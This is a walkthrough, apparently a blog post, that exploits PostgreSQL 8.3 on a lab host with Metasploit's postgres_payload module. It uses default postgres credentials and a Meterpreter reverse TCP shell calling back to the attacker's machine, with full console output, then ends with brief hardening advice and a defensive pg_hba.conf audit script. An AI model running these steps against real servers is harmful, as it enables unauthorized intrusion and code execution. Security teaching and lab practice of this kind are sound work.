
Metasploit in Practice: PostgreSQL Code Execution

2019-07-14  DreamsonMa

About PostgreSQL

PostgreSQL is an object-relational database management system (ORDBMS) based on POSTGRES version 4.2, developed at the Computer Science Department of the University of California, Berkeley, and since renamed PostgreSQL. It supports most of the SQL standard and provides many modern features: complex queries, foreign keys, triggers, views, transactional integrity and MVCC. PostgreSQL can also be extended in many ways, for example by adding new data types, functions, operators, aggregate functions and index methods. It may be used, modified and distributed free of charge, whether for private, commercial or academic purposes. https://www.postgresql.org/

Probing the target's PostgreSQL

Use nmap -sV -p 5432 <target IP> to fingerprint the PostgreSQL version running on the target.

➜  ~ nmap -sV 10.0.2.5 | grep sql
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

Exploiting PostgreSQL code execution

Use the PostgreSQL code-execution module in msf to obtain a reverse shell.

1. Start the msfconsole console

➜  ~ msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

2. Search for PostgreSQL exploit modules

msf5 > search postgresql

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Check  Description
   ----                                                       ---------------  ----       -----  -----------
   auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   auxiliary/admin/postgres/postgres_readfile                                  normal     No     PostgreSQL Server Generic Query
   auxiliary/admin/postgres/postgres_sql                                       normal     No     PostgreSQL Server Generic Query
   auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     Yes    PostgreSQL Database Name Command Line Flag Injection
   auxiliary/scanner/postgres/postgres_login                                   normal     Yes    PostgreSQL Login Utility
   auxiliary/scanner/postgres/postgres_version                                 normal     Yes    PostgreSQL Version Probe
   auxiliary/server/capture/postgresql                                         normal     No     Authentication Capture: PostgreSQL
   exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   exploit/multi/postgres/postgres_createlang                 2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   post/linux/gather/enum_users_history                                        normal     No     Linux Gather User History

3. Use exploit/linux/postgres/postgres_payload

msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

4. Choose a payload

msf5 exploit(linux/postgres/postgres_payload) > show payloads

Compatible Payloads
===================

   Name                                      Disclosure Date  Rank    Check  Description
   ----                                      ---------------  ----    -----  -----------
   generic/custom                                             normal  No     Custom Payload
   generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   linux/x86/chmod                                            normal  No     Linux Chmod
   linux/x86/exec                                             normal  No     Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file                                        normal  No     Linux Read File
   linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
lhost => 10.0.2.12

5. Check the option settings

msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    10.0.2.5         yes       The target address range or CIDR identifier
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

6. Run the exploit

msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 10.0.2.12:4444 
[*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 5163 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

Privilege escalation

See: Metasploit in Practice: Telnet Brute Force and Privilege Escalation

Defense and remediation

Defense: block connections to PostgreSQL from arbitrary IP addresses; allow only known clients to reach the service.
Remediation: upgrade to a current, patched version and harden the configuration.
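The run above succeeded because a password-authenticated superuser account (the default postgres/postgres credentials shown in the module options) was reachable over the network. The following script is an added example, not part of the original post: it audits pg_hba.conf rules for exactly that exposure, flagging rules that admit any address or that use no or cleartext authentication. The rule set and the "RISKY" output format are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit pg_hba.conf rules for the
# exposure the scenario above depends on, i.e. a password-authenticated account
# reachable from any address. Reads pg_hba.conf text on stdin, prints each risky
# rule, and returns 1 if any was found (0 otherwise).
audit_pg_hba() {
    found=0
    # Fields: TYPE DATABASE USER [ADDRESS] METHOD [OPTIONS]; "#" starts a comment.
    while read -r type db user addr method rest; do
        case "$type" in ''|\#*|local) continue ;; esac   # skip blank, comment and unix-socket rules
        # ADDRESS may be written as "IP NETMASK" in two fields; METHOD then sits in $rest.
        case "$method" in
            [0-9]*.[0-9]*.[0-9]*.[0-9]*) addr="$addr/$method"; method="${rest%% *}" ;;
        esac
        reason=""
        case "$addr" in
            0.0.0.0/0|::/0|all) reason="any address may connect" ;;
        esac
        case "$method" in
            trust)    reason="no authentication at all" ;;
            password) reason="cleartext password on the wire" ;;
        esac
        if [ -n "$reason" ]; then
            echo "RISKY: $type $db $user $addr $method  ($reason)"
            found=1
        fi
    done
    return "$found"
}

# Constructed sample: the kind of rule set the scenario above relies on, next to a tight rule.
if audit_pg_hba <<'EOF'
# TYPE    DATABASE  USER  ADDRESS                 METHOD
local     all       all                           md5
host      all       all   0.0.0.0/0               md5
host      all       all   10.0.2.0 255.255.255.0  trust
hostssl   all       all   10.0.2.12/32            scram-sha-256
EOF
then
    echo "no network-wide or unauthenticated rules found"
else
    # scram-sha-256 requires PostgreSQL 10 or later; on older servers use md5 with a tight ADDRESS.
    echo "tighten the rules above: restrict ADDRESS to known clients, prefer scram-sha-256, then reload"
fi
```

Run it as audit_pg_hba < /path/to/pg_hba.conf on a real server; a rule that passes this check still needs a non-default password for the postgres role and a firewall in front of port 5432.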

Recommended roundup post: Summary of Vulnerability Exploitation Patterns
